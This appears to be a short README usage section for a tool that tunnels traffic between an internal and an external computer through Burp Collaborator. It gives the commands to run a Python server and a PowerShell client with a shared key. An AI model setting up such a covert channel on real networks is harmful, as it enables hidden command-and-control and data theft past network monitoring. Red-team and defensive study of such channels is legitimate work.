- Open Burp Suite Professional.
- Open Burp Collaborator Client tool.
- Get a <BURPCOLLABORATOR-HOSTNAME-1> and URL decoded <BIID-1> for external to internal communication.
- Get a <BURPCOLLABORATOR-HOSTNAME-2> and URL decoded <BIID-2> for internal to external communication.
- Execute the python server script on the external computer.
(external computer) sh > python3 bi-server.py <BURPCOLLABORATOR-HOSTNAME-1> <BIID-2> S3cr3tK3y
- Execute the client powershell script on the internal computer.
(internal computer) PS > .\bi-client.ps1 <BURPCOLLABORATOR-HOSTNAME-2> <BIID-1> S3cr3tK3y
(internal computer) PS > .\bi-client.ps1 <BURPCOLLABORATOR-HOSTNAME-2> <BIID-1>
Enter Key: S3cr3tK3y